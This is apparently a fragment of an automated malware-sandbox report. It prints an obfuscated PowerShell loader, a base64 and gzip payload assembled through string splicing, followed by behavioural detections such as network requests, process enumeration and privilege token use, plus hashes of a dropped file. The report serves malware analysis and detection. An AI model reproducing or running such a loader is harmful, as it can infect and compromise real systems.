System.IO.MemoryStream(,[System.Convert]::FromBase64String((('H4sIADy1/m{1}CA71WbW/aSBD+flL/g1Uh2V{1}dzFvTJlKlW9vhJQkE4gABik4bezEb1l5ir0NIr//9ZsEOiUKq3Ek9SyT7MjM7+8wzMztLI09QHil8ddZ5VH58+EPJvi6OcahohdtTQyksHy713VZhOVa+KdoELZcODzGNpsfHd'+'hrHJBLbebFBBEoSEt4wShJNV/5WhnMSk4OLm1viCeWHUvir2GD8BrNMbG1jb06UAxT5cu+ce1i6VXSXjApN/f5d1ScH5Wnx5C7FLNFUd50IEhZ9xlRd+anLA6/WS6KpberFPOEzURzSqFop9qMEz0gHrN2TNhFz7icqXGV3mZiI'+'NI7knaSR'+'r{1}imwrAbcw/5fkySRDWUiTQ/mU7/1CbZ2ZdpJGhIiq1IkJgvXRLfU48kxS'+'aOfE{1}uyWwKWq6IaRRMdR3E7vmCaIUoZcxQ/o0ZrUNWOXLvVdKeK4FUV8S6AdF8dcs291NGtnrqHjch/jp8GQcAuZ8SvFlOG9Law5ndQv5NNjsEnNW6PKEb1W9KyVDacDAWPF7DtHAVp0SfPkENRzb9C+O91sq5KijORmk7gbXJgFN/urPwI'+'vKF4LMUeZvFDpnRiDjrCIfUy4mq7QsHmTGyAaS{1}i3XAQU3NNojvEE{1}CLCTEkhWv1E5CKp50rZQyn8TIg5Am4BVEW3/pzDZqmtqK2iQE9LZzoGlhBulBcuksJdb56XIOQqrNcJI{1}SjeF/PQMxSW{1}Ed9QUJTQb'+'A'+'ulgm+G6s7ddsoE9XAicnNT/QW{1}2aE2'+'jxIRpx5EFQC4cpfEo5hJPAylSX1irV0a5Iere9GwMWOQNmDpHqIBKxIFV0'+'iuxL6x5{1}VedIlohUtGQpDZVIs6wwHUhiw5NuTCAfHVvW7mObAlvEQlh+OZkxBql3FhKAMaC6g8G4Qlt/6TE6+LDnhjxySLjJZn18RaC5kAhaghCZr'+'hs0EjFoBEPeahhRNyWNuWF+2jeUG7CL6R03QpGSxoubWCXxt+feeLf3Z62zRptcXbnp10G/WviK6Clfe1gzz/1CdHLsj1BjVhd1GzR0tWb'+'e5ZpSs5LgcB8juwFozmHit1T8LzTiuxymCv7TnW46qSAE1rte'+'Z1CVWrt{1}tqaQHgjUBvAXohXT2cwxjq6MW5BXqlFjs5tS9vhpX6eMiaZq0+nw15'+'4h6OHNM0j3zstNcIWdyvttfX5Ut+1fRCqxZx88iuLdAJQnZ0Mqhb/GxkxahrDnCw5ENviP1G{1}CPr0K'+'Zk3OvXrV6vbqF+4/bOOTID82h4jefWcFCh4+X15Rzm9VWzd2aWai2'+'fPPLxCoBrcISDS5AJ7Io3n4GM8wlZnzo8qeCFxZEFMvXxHWrMR8t6l8H+Vb/C0{1}B1rjE6H6/rplkedWuoWeLDRoB6II4Dq4'+'dRcu88OmZ54HN/+LkzmpmDa/bFdOxed34t72wuQ/l31XTOvHF55V18+Xo+pIOQo75pDj4CJSZ9GolqZVoQ7qEsmh/+KPg3zjNivNUM2jhO5pgB{1}aDO5zlb53E9K95dTqWGpm17/4LEEWHQMqGp5nxHjHFPNg6o89Cyto1E9rV+a+PTvpGuPAnqu4aSLx0fj8FJSJ+oUTwnUSDmRumhWipBLyg9lGqbLHn/xWy+XEOva'+'hiyl0h{1}tobZxjD{1}ojNF0/4HnOCtIKB2v{1}XUW6DB0QsoNVD5tvkvobM4Z8+'+'B297qiQQ72ACvMtx6Ip8IkhugfUDulIKQXfR5Vy6k97+ZLVkNm8M//9ds2a39{1}vddDCoZG2Rerb5ceFb6fycAQ0wF'+'iLpQjBnZvg324ZAlyLPgpvdA/1n2yXfyRSoOOvD22rSCfwCWIEdMngsAAA{0}{0}')-f'=','Y')))),[System.IO.Compression.CompressionMode]::Decompress))).ReadToEnd()))4⤵
- Blocklisted process makes network request
- Command and Scripting Interpreter: PowerShell
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2128
-
-
-
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\PZK0WZBVLC7753W4JSDV.temp
Filesize7KB
MD575c92e005e8949a06c5f16c14316b8e5
SHA14a8cf4892c96191e8ea21c68c054139cb5ee4b89
SHA2562cfa27ab8e9967f843865b62b5be0b56132a0ea956ccdc6e2a6c62e7b1d931a2
SHA512eb79c17efc25dcdf580fc01e9765c70ca3c500d7c3225dfb73efeae8f615e90d8043e4972bcab6a78761698d1b04e84605780508cd65ce77872e3470bc14b6f6